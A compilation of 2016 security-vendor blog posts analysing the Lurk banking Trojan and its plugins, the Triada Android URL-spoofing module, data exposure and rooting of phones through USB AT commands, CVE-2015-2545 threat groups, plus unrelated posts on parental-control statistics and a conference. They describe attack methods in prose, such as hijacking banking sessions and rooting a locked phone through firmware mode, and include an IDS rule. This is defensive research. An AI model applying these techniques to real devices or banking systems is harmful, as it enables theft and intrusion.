Plugin GUID Name Plugin function {5FBA6505-4075-485b-AEC4-75767D9054C9} module_Bifit A set of .class-files designed to introduce changes into the normal operation of iBank 2 systems, in order to steal money. {0F3E7AFA-1F2B-4b0e-99D6-3716A4C3D6DE} module_Bifit_admin An administrative applet for iBank 2 systems modified by cybercriminals, designed to steal credentials and key files from iBank 2 systems. {04DB063E-1454-4a73-B2CC-4DB6D4BB6AA1} module_ibank This plugin is used to inject malicious applets into the iBank 2 system. These applets (along with other tools) are used to steal money from the user. {AABA3126-14E2-443b-A11B-FB6C1F793103} module_w3bank This plugin is designed to organize web injections into the pages of remote banking systems. {5C345F77-B111-4a85-B6D6-EC8F27F993C4} module_w3bank_scripts A set of scripts written in JavaScript for injection by the module w3bank; designed to steal money and data from remote banking systems. {50D13F6C-FC46-4fdf-A294-E149D36E54D4} module_spider An auxiliary module whose main task is to ensure other Lurk modules are loaded into the contexts of the processes iexplore.exe, firefox.exe, chrome.exe, opera.exe, jp2launcher.exe, java.exe before these processes are actually launched. {52F1F7D8-4BCC-4498-AC86-3562F81990F6} module_vnc This plugin provides remote access via VNC to the infected computer (for remote control over the infected computer). {A06B5020-0DF3-11E5-BE38-AE5E4B860EDE} rdp-plugin-x86 This plugin ensures that RDP is enabled on the infected computer.

{9F786E98-3D4C-4020-8819-B97D9D4DBCC0} highLauncher Bot plugin loader at a high Integrity level (required for rdp-plugin-x86 and lsa-plugin-x86). {968A2A9A-7DF4-4E69-BF81-563AF8FFB7DC} launcher The loader of mini. It awaits an IPC message with the name <LurkDll>, after which it loads mini with the help of LoadLibrary(). It is used in the mini launch process while escalating privileges. {5B3957F2-AAAF-4FF8-94B8-83C52AFCD2A9} lsa-plugin-x86 The plugin for grabbing administrator and/or domain accounts (the well-known program mimikatz is used).

We will now look at three bot modules (plugins) in more detail – they are the modules w3bank and ibank.dll – the two workhorses of the Lurk Trojan that are directly involved in stealing money – and the module_vnc module that makes it possible to remotely control the infected system using the VNC protocol.

The w3bank module

The w3bank module is designed for attacks on remote banking systems. Its main task is to perform injections into the user’s browser.

The ibank module

The ibank module is designed to steal money in iBank remote banking systems.

This module runs in the context of a Java virtual machine. When a Java applet is started, it is checked to see whether it belongs to the iBank 2 system. If this remote banking system is launched, a request is sent to the C&C asking if the applet should be blocked or allowed to run. If an “allow to run” command arrives in response, a set of Java-class files is sent to replace the original classes of the iBank applet.

The infected applet enables the cybercriminals to stealthily replace the data in payment orders, leaving the original information in the printouts.

The module_vnc module

The module_vnc module provides the ability to remotely control an infected system using the VNC protocol. When this happens, the remote node gains full access to the system: it can see the image displayed on the screen, send and receive any files or data, including data from video/audio input devices, use the software installed on the machine and install new software.

This module also makes it possible to launch browser processes with the following parameters:

Mozilla Firefox: -profile
Google Chrome: –user-data-dir=
Internet Explorer: -nomerge

Each time Mozilla Firefox and Google Chrome are launched a new browser user profile is created. This helps hide the Trojan’s activities from the legitimate user, who will not be able to see any trace in the history of visited sites. This also helps create a separate session on a website, parallel to an already open session. In particular, this makes it possible to log in a second time to the site the legitimate user is working with, and perform actions in a parallel session that will not affect the user’s session.

Stages of a Lurk attack

As a result, the Trojan’s typical attack sequence is as follows:

  1. The user’s computer is infected by exploiting a vulnerability;
  2. The mini module is launched on the infected computer;
  3. mini downloads the prescanner module and launches it;
  4. prescanner steals the user’s FTP credentials;
  5. If an analysis finds that the infected computer is unsuitable, mini and prescanner silently terminate themselves.
  6. If the infected computer is of interest to the cybercriminals, the attack continues.
  7. If the attack continues, mini downloads and launches the core module, the bot’s main body.
  8. core connects to the bot’s C&C server, receives commands from the cybercriminals and executes them.
  9. core receives the bot’s additional plugins.
  10. core spies on the user: intercepts data entered from the keyboard, and captures the video stream from the screen of the infected system. Capturing is only performed for windows with specific keywords/phrases in their names. A list of keywords is received from the C&C and is primarily determined by the financial interests of Lurk’s owners.
  11. Using additional modules (ibank, w3bank), Lurk steals money from remote banking systems.
Example of an Attack on a Bank

During our research, we detected a Lurk attack on a major Russian bank that was using the w3bank module to perform web injections. We were able to obtain the scripts of the injections.

The files of the infection scripts have identical names for different remote online banking systems (content.min.js), but a different GUID, as the latter is generated in a random fashion.

This script intercepts the authentication information entered into the remote banking system. When the user logs in to the remote banking system, their username and password are intercepted. After successful authentication, a parallel session is created that is hidden from the user and in which Lurk scans the banking pages and searches for the card holder’s name and the phone number linked to the card. The malicious script collects all the information required to make a payment in that online banking system. This information is then sent to the C&C server whose address is identical to the network address of the server communicating with the core module.

In response, the C&C server may send a script to be executed in the browser context. We were unable to obtain such a script for this research.

The C&C server may also register an automated payment that will be executed the next time the user logs in to the online banking system.


The Trojan’s creators have made an effort to protect their creation from researchers, and especially to protect Lurk from an in-depth analysis, or, at the very least, greatly hinder such analysis. However, despite all the difficulties of analyzing the Trojan, Lurk is quickly detected by modern anti-malware solutions.

It’s not only anti-malware companies that are countering Lurk; the manufacturer of the iBank 2 system, BIFIT, is also taking measures to combat the attacks launched against its product. The company has implemented methods to counteract banking Trojans in its iBank 2 software and investigated their effectiveness. The BIFIT research shows that of all the protection tools implemented in iBank 2, only control over the bank’s server is effective against Lurk; all the other measures implemented in iBank 2 were successfully bypassed by the Lurk creators, testifying to their professionalism.

Lurk gives the impression of being a complex, powerful system designed to achieve its creators’ criminal goals, i.e., stealing money from users. The perseverance and focus with which they work with their Trojan suggest they are highly motivated.

Kaspersky Lab counteracts this Trojan using signature-based, heuristic and proactive detection methods. With this approach, we can even detect new specimens of Lurk before they are added to our collection. Kaspersky Lab’s products detect this Trojan with the following verdicts: Trojan.Win32.Lurk, Trojan-Banker.Win32.Lurk, Trojan-Spy.Win32.Lurk.

In conclusion, we give the following recommendations that may be hackneyed but are nonetheless relevant. The security of an online banking system is ensured by:

  • Competent design and administration of an organization’s local area networks;
  • Regular training on information security rules and norms for employees;
  • Use of modern security software that is regularly updated.

We are confident that observing these simple rules will help ensure a high level of protection from Lurk and similar threats.

IOCS: Registry keys:


Files: Possible names of the mini module:


Possible names of the storage module:


Network indicators: C&C servers:


IDS rules:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”Bot.Lurk.HTTP.C&C”; flow:established,to_server; content:”POST”; pcre:”/\?hl=[a-z]+&source=[^\r\n&]+&q=[^\r\n&]+/msi”;)

MD5: mini:












Everyone sees not what they want to see

Malware Alerts - Mon, 06/06/2016 - 06:57

In early March, Kaspersky Lab detected the modular Trojan Backdoor.AndroidOS.Triada which granted superuser privileges to downloaded Trojans (i.e. the payload), as well as the chance to get embedded into system processes. Soon after that, on March 15, we found one of the modules enabling a dangerous attack – spoofing URLs loaded in the browser.

The malicious module consists of several parts and is detected by Kaspersky Lab products as Backdoor.AndroidOS.Triada.p/o/q. When it gains superuser privileges, it uses regular Linux debugging tools to embed its DLL (Triada.q, which then loads Triada.o) into the processes of the following browsers:

  • (the standard Android browser)
  • com.qihoo.browser (360 Secure Browser)
  • com.ijinshan.browser_fast (Cheetah browser)
  • com.oupeng.browser (Oupeng browser)

The DLL intercepts the URL the user is opening, analyzes it and, if necessary, changes it to another URL. The rules for changing the URL are downloaded from the C&C server while the module is running.

Attack sequence

In an uninfected system, the browser sends a request with a URL address to the web server via the Internet, and receives a page in response.

After infection by Triada, a DLL intercepting URLs is added to the browser’s process. The URL address request finds its way into this DLL, where it is modified and sent to another web server.

As a result, the browser receives data that’s different from that requested, meaning the user ends up viewing a different page.

Now, this sequence of actions is being used by malware creators to change the standard search engine selected in the user’s browser, and to replace the home page. Essentially, these actions are identical to those carried out by numerous adware programs for Windows. However, there is nothing to stop similar attacks intercepting any URL, including banking URLs, and redirecting users to phishing pages, etc. All it takes is for the cybercriminals to send the appropriate command.

During our observation period, this module attacked 247 users, and there have been no signs of a decrease in the intensity of attacks. The number of module versions is small; it appears the creators of this backdoor have decided to focus their efforts elsewhere, in spite of all the ‘promise’ shown by this technology.

The geography distribution is very similar to that of root-access malware, as this module can only function together with Triada, and is downloaded by Triada.

Number of users attacked by Backdoor.AndroidOS.Triada.p in different countries

In conclusion, we would like to note that cybercriminals specializing in Android are pretty lazy – it’s easier for them to steal money directly, for instance, with the help of Trojans that send text messages to premium-rate numbers, or spoof banking app windows. However, we have recently observed that some cybercriminals have begun to actively study the structure of the operating system, expand their repertoire of technical skills, and launch sophisticated attacks like the one we examined above.

Small users in a big network

Malware Alerts - Mon, 05/30/2016 - 06:58

Children use the Internet for schoolwork, socializing, watching films and cartoons, playing games and much more. But, as we all know, browsing the web can be an unsafe business. In order to control their children’s online activity many parents use specialized software – so-called parental control.

This software is usually capable of controlling the amount of time a child spends online or using the computer, which apps can be launched and what personal data can be disclosed. One of the most important features of a parental control product, however, is the ability to restrict access to web resources containing undesirable content.

This article examines the statistics of visits by children to websites with specific categories of content. For this we will use Kaspersky Security Network (KSN) statistics based on notifications by the Parental Control module in Kaspersky Lab products. These statistics will allow us to estimate which categories of undesirable websites children visit most often.

How the statistics are collected

Kaspersky Lab’s Parental Control module scans the content of the webpage that a child is trying to visit. If the site belongs to one of the 14 categories listed in the module, it notifies KSN (no personal data is involved and the user’s confidentiality is respected).

Access to that webpage is only denied if the parents have selected the appropriate category in the product settings. The statistics are collected anonymously, regardless of whether the parents have selected the appropriate category (i.e., whether or not that category is blocked by Parental Control).

It should be noted that these statistics do not include mobile device statistics.

At the current time, web filtration is carried out for the following content categories:

We selected the first 12 categories for analysis. We decided to omit “Religion” and “News media” as these categories were only introduced recently and sufficient statistics have not yet been collected.

The global picture

First of all, let’s look at the global statistics.

Distribution of Parental Control notifications between the 12 website categories globally, April 2015 – April 2016.

We can see from this diagram that children around the world spend most time on social networking sites and instant messengers, playing computer games, and, while online, repeatedly encounter the themes of alcohol, tobacco and drugs. Less frequently, children and teenagers visit online stores, watch videos and listen to music online, sometimes encounter obscene language and occasionally visit (perhaps accidentally) porn sites.

These are the average statistics for the entire world. But are they the same for all regions or countries? It turns out that they aren’t.

Regional differences

For our comparison, we selected the top five website categories from the global ranking and looked at how they differed across five regions:

  • North America (US and Canada)
  • Western Europe (Austria, Belgium, UK, Germany, Denmark, Ireland, Spain, Italy, Liechtenstein, Luxembourg, Monaco, Portugal, France, Switzerland, Sweden)
  • CIS (Russia, Kazakhstan, Belarus, Ukraine)
  • Latin America (Argentina, Brazil, Mexico)
  • Far East (China, Singapore, Hong Kong, Macao, Taiwan, Japan, South Korea).

The results of the comparison are shown below:

Proportion of Parental Control notifications for Top 5 categories in different regions

In North America, children visit social media websites, use instant messaging systems, chats and forums less frequently than the world average, although they show more interest in computer games, alcohol and online shopping.

The situation in Western Europe is very similar to that in North America.

In the CIS, children and teenagers are less interested in online shopping than in other regions.

In Latin America, as well as in the CIS, Internet communication media are very popular with kids and teens, while computer games are played less frequently than in other regions.

The situation is different in the Far East. Social networks are almost as popular there as they are in western countries, but kids and teens don’t spend as much time playing online computer games (which may be due to the popularity of game consoles). Instead, they spend more time visiting online shops, such as the Japanese Rakuten,, Uniqlo, and Taobao in China.

Differences between countries

We found that even between countries within the same region there are differences in the popularity of the website categories. For the purposes of comparing the situations in different countries, we added the “Adult content” category to the top five. Let’s begin with that category.

Adult content

When we speak of children’s safety online, it’s impossible to avoid the topic of pornography – this is the worst nightmare for millions of parents. For quite some time, this category was at the top of the ratings, but we now have some good news! According to Kaspersky Lab’s Parental Control statistics, children from around the world are visiting pornographic and erotic websites, adult dating sites and online sex shops less and less.

Popularity of the “Adult content” category around the world, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control module statistics

However, we cannot rule out the possibility that children visit adult content websites from their mobile devices: for them, it is easier to watch porn on their phone, with no parental control tools installed, than it is on a computer that is closely watched by their parents.

Children in China show the most interest in adult content sites. Children in the UK, US and Russia visit such sites less often.

Popularity of the “Adult content” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control module statistics

According to Kaspersky Lab’s Parental Control statistics, the adult content website www.xvideos[.]com is the most popular in all regions. If the Parental Control module is configured to block access to adult content sites, then a child’s attempt to visit this site will finish with a warning screen being displayed. It should be noted that Safe Kids, Kaspersky Lab’s new product, works on mobile devices as well:

Safe Kids notification on a mobile device

If you want to reliably safeguard your child from adult content, make sure you block this category in the parental control module.

Internet Communication media

67% of all visits were to websites belonging to the “Internet communication media” category, which includes social networks, instant messengers, chats and forums.

Unsurprisingly, social networks are the most popular sites with children throughout the world – these sites allow them to talk to their friends, keep a kind of diary, share photos and videos, as well as shop online, play games, and watch cartoons or films. As well as all that, there is a lot of content that children shouldn’t be seeing: on some social networks you can find pornography, purchase drugs.

The most frequently visited sites in this category are Facebook, Twitter, YouTube and Pinterest. To a lesser extent children also visit Instagram and the web-based version of the WhatsApp messenger.

According to KSN data, over the last year and a half children and teenagers have been spending less time chatting with their friends online from their computers.

Popularity of the “Internet communication media” category worldwide, Jan 2015 – Apr 2016, according to Kaspersky Lab’s Parental Control statistics

We presume that this is due to the growing popularity of mobile Internet. Today, mobile devices are being used more and more for online communications, especially in developed countries. This is beyond the scope of this analysis, however, as we are looking at the statistics of Parental Control module detections on computers; these statistics don’t take into account how many times a day children and teenagers visit their social media accounts from mobile devices. Also, IM services such as Telegram or Viber are primarily accessed from mobile devices. In other words, children, and especially teenagers, are far more active than these statistics suggest when it comes to both types of online communications (i.e. mobile- and computer-based).

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Internet communication media are most popular in Mexico, Brazil, Russia and Italy, and least popular in China, Germany and the UK.

We presume that for China, this is due to the state’s Internet censorship practices, while in Germany and the UK it is related to the widespread use of mobile technologies and smartphones in the everyday lives of schoolchildren.

This is all well and good – technologies make our world more convenient, and talking to someone face-to-face on the other side of the planet can seem like magic! But any magic has a dark side to it. Child molesters, fraudsters, trolls, perverts and other nefarious characters can spoil the life of a child or teenager who doesn’t stick to the rules of conduct on social networks. Read more here about how children and teenagers should behave on the social networks to protect themselves from malicious users.

Computer games

Children have always played games. However, in recent decades real-life games have been almost completely superseded by computer games.

Today’s computer games are products of advanced technologies; they are realistic, social, absorbing, spectacular creations by designers and script writers. It comes as a little surprise that gaming sites around the world come second in terms of popularity among children and teenagers.

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Computer games are least popular in Japan, Italy and Mexico. However, in these countries there are different reasons for this. Game consoles such as Sony PlayStation and Nintendo are widespread in Japan, where they are manufactured. In Mexico and Italy, judging by our statistics, kids and teens simply prefer social networks to computer games.

Steam is one of the gaming sites most often visited by children and teenagers. It is in fact more than a mere online gaming store – it is a large gaming community where kids and teens can talk to fellow gamers, find new friends, read news and, naturally, purchase games and share their in-game achievements.

Steam’s homepage

As can be seen in the statistics of websites visited by children, Minecraft is another gaming website that children and teens often visit. Minecraft can be seen as an educational (edutainment) game, and in some countries it is even part of the school curriculum, within the framework of the MinecraftEdu project.

The time that your child spends playing computer games needs to be regulated. Overindulging in games can lead to a dependence. This is especially relevant for so-called infinite games that are limited to one game plot and do not have a beginning or end. Massively multiplayer online role-playing games (MMORPG) fall under this category. Cases are known when overuse of MMORPG has led to psychological harm, gaming addictions and even to death by exhaustion.

Parents should also take note of what games their child is playing, the age ratings and the contents of the game, as well as the kind of skills they develop.

Computer games are not bad, but it’s better for children to spend their time productively.

Alcohol, tobacco, narcotics

The popularity of websites in the “Alcohol, tobacco, narcotics” category came as a bit of a surprise. Children in Germany (22.79%) and the UK (25.37%) show most interest in this topic.

Popularity of the “Alcohol, tobacco and narcotics” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

However, a child can encounter this topic just about anywhere on the Internet. For example, in all types of teenager blogs it is not uncommon to see a picture of a girl with a bong, or pictures glorifying vodka.

Publications in social media promoting the consumption of alcohol, tobacco or drugs

Similar messages often occur on different entertainment sites, such as 9gag.

Images published on the website 9gag

In recent years, “legal highs” have become widespread, and can be easily purchased online. The authorities in different countries have trouble keeping up and block hundreds of new legal high websites that appear online every day. Social media also contains numerous offers to buy “legal” narcotics.

Online shop selling “legal highs”

Synthetic drugs are by no means legal, let alone safe. The effect of consuming “spice” and “salts” is unpredictable and can lead to serious harm.

Electronic commerce

The popularity of this category shows just how interested children are in online shopping.

Popularity of the “Electronic commerce” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

As we can see, children and teenagers in China, Japan and the US visit online shops more frequently than others. Judging by the list of websites most often reported by the Parental Control module, the most popular online shops are Taobao in China, Uniqlo in Japan, and Amazon in the US.

Software, audio and video

An interesting trend can be seen in the “Software, audio, video” category. Over the last year and a half, visits by children and teenagers to visit websites where they can download or watch films, cartoons or listen to music have doubled.

Popularity of the “Software, audio, video” category in different countries, January 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

On the face of it, this website category doesn’t seem to be a big deal. However, you shouldn’t forget about illegal software and malware – it may not hurt your child, but could cause quite a bit of damage to your computer.

Popularity of the “Software, audio, video” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Children in Japan watch cartoons and listen to music online more often than their peers in other countries. The figures for Russia and Mexico are the lowest. In Russia, this may be due to the fact that most young users listen to music on the VKontakte social network.

According to Kaspersky Lab’s Parental Control statistics, YouTube is the most popular website in this category.


The popularity of certain types of websites among children in different countries could be linked to each country’s cultural peculiarities and economic conditions.

If we look at the entire global picture, there is a downward trend in the popularity of Internet communication media among children and teenagers. The underlying reason is the increasing use of mobile technologies and the availability of smartphones in developed countries, the emergence of convenient mobile social media and Internet communication apps, and the fact that users can always stay online thanks to their mobile devices. However, in those countries where smartphones are less prevalent, children tend to use computers more often for online communications.

Interestingly, the lower the “Internet communication media” index is for a specific country, the more popular computer games are:

Popularity of the “Internet communication media” and “Computer games” categories in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

It’s interesting to see that children are becoming increasingly self-sufficient online: they choose which music they want to listen to, which films or cartoons they watch, and which products they want to – possibly – purchase.

Self-reliance is a positive trait for your child, but you still need to keep tabs on what they are doing online, just like in real life. Parental control software may just be an aid to safeguard your child from undesirable content, but it could well come in very handy – so don’t just dismiss it out of hand. For example, Kaspersky Lab’s product Safe Kids not only blocks undesirable sites but also notifies the parents of any alarming search requests that a child makes, and about their activities on social media. Since Safe Kids operates on mobile devices as well, parents can also get information about where their child is.

For today’s children, and especially teenagers, the Internet is their natural habitat. We do everything we can to keep it safe.

BerlinSides …electrifying!

Malware Alerts - Mon, 05/30/2016 - 05:57

It was the last weekend of May and just like every year, hackers, forensic experts and pentesters met at the University Hall in Berlin for the BerlinSides conference. ‘A con from hacker for hacker’. This years motto is ‘electrifying’ and the badges and shirts show the picture of Nikola Tesla.

BerlinSides is the successor of the PH-Neutral conference held by FX, who once said he’s going to host his conference for ten years. After that, Aluc stepped in and now runs the BerlinSides conference since 2010.

Start was right after the PXE conference ends on Friday 27th of May and it lasts for four days. As usual, the last day got labeled “OpSec 4 Nerds” and held in a Dojo. It’s about “hand to hand combat” and optional to all attendees who have a good health insurance. Today is the last day of the conference and the exercises in the Dojo are going on right now.

The schedule of the conference can be found here:

In contrast to the Chaos Computer Congress, this conference is by invitation only and just like in Las Vegas, what’s happening inside of BerlinSides stays inside. No journalists, cameras or any recording devices are allowed. Speakers can go into details and give some unique insights in projects, incidents and new vulnerabilities.

0x100 people attended the conference this year and beside the talks I also enjoyed the networking, music and party. I met people I haven’t seen for a while, some I never met before and we had some good discussions.

Kaspersky Lab is the premium sponsor of this years’ conference and we are happy to see such great events and to support the community.

My colleague Stefan Ortloff held the opening talk named “Cross-Platform Malware To Attack The Bitcoin-Sphere” and gave some insights in an ongoing investigation conducted by himself.

(Host Aluc on the right, me on the left side)

Due to the nature of this conference, there aren’t any further details I can add to this blog, but I’d like to thank Aluc for his commitment and I look forward attending next year again!

Wired Mobile Charging – Is it Safe?

Malware Alerts - Thu, 05/26/2016 - 06:56

Mobile phones. Nowadays, they are our constant companions, our confidants. They know everything about our everyday lives. Every day, whether we’re on our way to or from work or just wandering around the city, mobile phones collect this information. We take photos, share our impressions on social networks, send work and non-work related mails, text messages, and make calls. All this information makes our smartphones a treasure trove for data thieves.

And we are confident that all this data is secure.

Manufacturers assure us that their devices and the data on them are safe. They release updates containing security fixes.

We also take steps to protect our privacy. Tinkering users install custom firmware, discover operating system mechanisms, acquire root access to have deeper control over their phone and use software that, according to them, is more secure and convenient.

The average user who prefers to just use his phone without digging any deeper, sets a PIN code, a complex password or fingerprint scanner, and sticks to official app stores.

Most users believe these measures make their data safe. But is that really the case?

The following experiment displays, that sometimes just charging your device may bring you trouble.

Data transmission

A while ago I started to dig a bit deeper into what happens when you connect your phone to your computer. Usually, when your phone is protected, you will only see the phone name on your PC. If it has no PIN/password, you’ll be able to access all the media files on the device.

The amount of data exchanged varies depending on manufacturer, OS version, low-level firmware. But data is always present. Even if it’s a phone with the latest Android OS (Marshmallow), or iOS 9.

Data transmission – comparison table

Here is a comparison table on the data exchange between a computer and connected mobile phone during the handshake. It varies depending on the mobile and desktop OS combination:


DN – Device Name
DM – Device Manufacturer
DT – Device Type
SN – Serial Number
FW – Firmware info
OS – Operating System info
FS – File system info/file list
ECID – Electronic Chip ID

Device Device OS Mode Host OS Data size (bytes) Data type Nexus 5 Android 4.4 MTP (default) Windows 8.1 32 336 DN, DM, DT, SN, FS MTP (unblocked) Windows 8.1 32 155 DN, DM, DT, SN, FS MTP + ADB Windows 8.1 11 946 DN, DM, SN MTP (default) Windows 10 8 827 DN, SN MTP (unblocked) Windows 10 242 206 DN, SN, FS MTP + ADB Windows 10 10 582 DN, SN, FW MTP (default) OSX 10.9 1 213 DN, DM, DT, SN MTP (unblocked) OSX 10.9 581 DN, DM, DT, SN Nexus 6 Android 6.0.1 Charging only (default) Windows 8.1 8 965 DN, DM, SN MTP (unblocked) Windows 8.1 39 418 DN, DM, DT, SN, FS Charging only (default) Windows 10 8 975 DN, SN MTP (unblocked) Windows 10 91 342 DN, SN, FS Charging only (default) OSX 10.9 14 000 DN, DM, DT, SN MTP (unblocked) OSX 10.9 7 674 DN, DM, DT, SN Samsung Galaxy S4 Android 5.0.1 MTP (default) Windows 8.1 4 098 DN, DM, DT, SN MTP (default) Windows 10 7 740 DN, DM, DT, SN, FS, FW Apple iPhone 5 iOS 9.1 Default (locked) Windows 8.1 5 001 DN, DM, SN Default (locked) OS X 10.9 83 272 DN, DM, DT, SN, OS, ECID, device public key Unblocked + Paired Windows 8.1 1 829 145 UniqueChipID, device class, iOS version, SessionID, device model, File System total size, File system free space Unblocked + Paired OS X 10.9 23 223 DN, DM, DT, SN, OS, ECID, device public key

All in all, that’s quite a fair amount of information about the device.

What else?

While I was conducting this minor research, I stumbled upon one very peculiar feature in a smartphone from a very popular manufacturer. I found out that while installing the CDC driver (I was using a normal Windows PC and completely standard microUSB cable) this phone also installs a COM-port, labelling it as a modem. At first glance it doesn’t look like anything unusual. However, this phone had no USB tethering enabled, and no Developer mode or ADB (USB debugging) enabled either.

This COM-port is available for connection using default methods.

So, we reached the modem. Or not. What we reached is probably just an interface layer that allows us to talk to the modem; it’s not a direct connection.

Now for the theory. Android consists of different layers, one of which is RIL. RIL stands for Radio Interface Layer. It is responsible for allowing Application level apps (e.g. Android telephony framework) to interact with modem hardware via specific commands (both send requests and receive answers).

To avoid going too deep into the details, I won’t describe the RIL Java sub-layer that talks to the rild daemon, or Vendor RIL. Let’s just call it RIL (Radio Interface Layer).

Historically, all modems use a command set called the Hayes command set, developed by Dennis Hayes way back in 1981. The commands used to talk to the modem are called AT-commands. The commands that are available for applications to call through RIL, and for RIL to transmit to the modem, vary depending on the modem firmware limitations set by the manufacturer, RIL limitations, etc. Many manufacturers also implement their own vendor-specific commands for their modems. For example, Qualcomm uses AT$Q<command> extension, Infineon – AT+X<command>

ATI1-9 commands return general information about the device and modem, e.g.
ATI1 returns the software version code.

ATI2 returns IMEI numbers. From here we can see that the device has a dual-sim.

You can dig up more info with the other AT commands.

Digging, digging

By digging a bit further, we can find all the commands available for the modem. Note that many of them are restricted and/or require parameters and will return an “Error” otherwise.

By the way, vendor-specific commands won’t be listed here!

We can check the mobile signal level by AT+CSQ, battery level, etc.

There is also one very interesting command – a default for modems – that allows any number to be dialed regardless of whether the screen is locked or not. This is a very peculiar feature for phones locked with a PIN code, because you can usually only call an emergency service from a locked screen.

There are commands that allow you to read the SIM card’s phonebook. The phonebook is not accessible on this particular phone, but who knows about other vendors?

The scary part

You may think: “So what? What can be done with this information?” But just think about it, you can pull vendor information, firmware details. That gives you enough data to analyze the device’s security. You can find out the owner’s mobile phone number – by calling your number. By finding out the battery level you can predict how long the user will keep the charger plugged in. Not bad at all, I’d say.

But there’s more that you can do with this information.

Experimenting further I stumbled across one more command – it actually performs a phone reboot to the firmware update mode. This mode actually allows an infiltrator to perform all kinds of actions with the user’s device, given the right circumstances.

So I conducted an experiment. I restored the phone to the factory firmware, reset it to default settings to ensure no other interface like ADB was available outside.

First, I connected the phone to my computer.
Then I pulled the firmware data with AT commands, to determine the device type and OS.
After that I entered that last command I came across and the phone rebooted to the firmware update mode!

What happened next?

With the information gathered via AT commands, I identified the device.

And then I used an easy-to-use root solution as a proof-of-concept. So I found the appropriate package for the device, fired up the firmware update application, and here’s what happened next:

The update took around a minute (the file is very small). The phone rebooted to perform an actual root installation:

Root package was installed, and it cleaned itself up.

The phone rebooted again, and what do we see –

All the user’s data is safe, but now he has one more app that cannot be uninstalled with default measures and it has root access to file system. I checked the timer – it took a little under 3 minutes for the whole procedure, and that’s taking into account that I was pressing buttons manually.

Imagination time

Now it’s time to use your imagination. What if?

What if that package didn’t have a generic purpose (with lots of additional features), but had one specific task to install a specific application or change the device configuration?

That would make it possible to minimize the package size and script, thus reducing the installation time.

What if it installed a system daemon, instead of some package? What if it installed a backdoor? What if it was some kind of Android Trojan – which are very common nowadays – and worked in the background, sharing everything on your phone with someone sitting on the other side of the world?

What if it enabled developer mode and ADB, and added the computer’s fingerprint to a trusted database? These changes wouldn’t be detected by a security solution (if one was installed), since they are default phone functions. It also wouldn’t take very long to execute.

And what can we do from a trusted computer via ADB to the connected phone?

The answer is – a lot. We can install and delete applications. We can back up the message database, photos and videos, the applications cache and data files. And it can be done pretty fast.

And these scenarios are only those that involve data theft.

There are other possible destructive actions such as wiping the phone, deleting data, encrypting data and asking for a ransom. The possibilities are infinite.

So let’s imagine a scenario where you are on a trip and you just got off the plane after a flight of 5-8 hours. Your phone is almost dead. You find a charging station with USB – a blessing!

You connect your phone to start charging, put it down and mind your own business for 20-30 minutes, or more. Or less. It doesn’t matter.

Now look at what has been described above. How long do you think it will take for a script to perform those actions, download every bit of data from your phone and/or infect it with malware?

With that sort of data you can be hacked, you can be tracked, your data (including corporate data) can be compromised or destroyed.

Simple as that.


There are large communities around the world that specialize in exploring operating system internals, modifying them and releasing the results of their hard work to the public.

Other people use the results of this work to upgrade their devices. But there is no guarantee that the firmware they have just installed on their phone is free from vulnerabilities and backdoors. They may forget to disable the developer or debugging mode. They may be installing a hidden package, or background service for data collection and transfer.

Despite all manufacturer’s efforts, absolute security of mobile devices is virtually unreachable.

Our experiment proves it. It has been conducted on just one vendor, but there’s nothing to say that holes like this don’t exist on the phones of other vendors. All of the above was done using public information only.

I dug around and found that this vulnerability was found at Black Hat and reported some time back in 2014. It did not create much of a buzz, as far as research of the news and social media shows, and it still exists, even on the very latest models.

While working on this article I found that these guys also discovered this hole, to some extent.

Stealing data from connected to a computer mobile phone technique has been utilized, for example, during ill-known cyberespionage campaign Red October in 2013.

Possibility of data theft from mobile phone when using public charging spots has been described by our experts in 2014. You may think that it is paranoid to think that no one will bother with installing malicious charging stations at airports, cafes, bus stations. But we think differently.

CVE-2015-2545: overview of current threats

Malware Alerts - Wed, 05/25/2016 - 06:56

CVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099. The vulnerability affects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1.

The error enables an attacker to execute arbitrary code using a specially crafted EPS image file. The exploit uses PostScript and can evade Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection methods.

The exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East.

In this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups.

Overview of groups using CVE-2015-2545

Platinum (also known as TwoForOne)

The group is believe to originate from South-East Asia. Its attacks can be traced as far back as 2009. The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India.

This group was the first to exploit the CVE-2015-2545 vulnerability. After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected.

Microsoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia.


The group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan. These attacks were described in a FireEye research paper – The EPS Awakens – Part 2.


In December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated Postscript) object. The EPS object contained a shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture. This, in turn exploited another vulnerability to elevate privileges to Local System (CVE-2015-1701) and download additional malware components from the C&C server.

